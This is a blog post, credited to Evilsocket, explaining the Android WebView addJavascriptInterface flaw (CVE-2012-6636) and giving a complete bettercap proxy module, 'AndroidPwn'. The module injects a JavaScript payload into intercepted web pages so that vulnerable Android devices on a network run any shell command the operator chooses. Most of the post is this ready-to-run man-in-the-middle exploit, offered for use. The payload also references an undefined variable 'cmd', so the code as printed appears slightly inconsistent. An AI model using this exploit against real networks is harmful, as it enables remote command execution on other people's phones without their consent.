Monday, January 18, 2016

Vulnerability In Web View Put Android Device Vulnerable To "MITM" Attack

Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.
hacked
There's an excellent post about this vulnerability, long story short, if there's an app which is using aWebView UI control and it's declaring a custom javascript interface for it like so:
public class WebViewGUI extends Activity {  
WebView mWebView;
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mWebView=new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
mWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mWebView);
}

final class JavaScriptInterface {
JavaScriptInterface () { }
public String getSomeString() {
return "string";
}
}
}
you can inject some special javascript into that page and make that device execute any shell command you want.
In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.
class AndroidPwn < BetterCap::Proxy::Module  
@@command = nil
@@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
" break;\n" +
" }\n" +
"catch(e) {}\n" +
"}\n" +
"</script>"

def self.on_options(opts)
opts.separator ""
opts.separator "AndroidPwn Proxy Module Options:"
opts.separator ""

opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
@@command = v.strip
@@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
end
end

def initialize
raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
end

def on_request( request, response )
if is_exploitable?( request, response )
BetterCap::Logger.info ""
BetterCap::Logger.info "Pwning Android Device :".red
BetterCap::Logger.info " URL : http://#{request.host}#{request.url}"
BetterCap::Logger.info " AGENT : #{request.headers['User-Agent']}"
BetterCap::Logger.info ""

response.body.sub!( '</head>', "</head>#{@@payload}" )
end
end

private

def is_exploitable?(req,res)
req.headers.has_key?('User-Agent') and \
req.headers['User-Agent'].include?("Android") and \
req.headers['User-Agent'].include?("AppleWebKit") and \
res.content_type =~ /^text\/html.*/ and \
res.code == '200'
end
end
As you can see, you just need to activate it and specify a --command COMMAND command line argument and you're ready to go.
androidpwn
Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it will find on the network.
Source:Evilsocket

No comments:

Post a Comment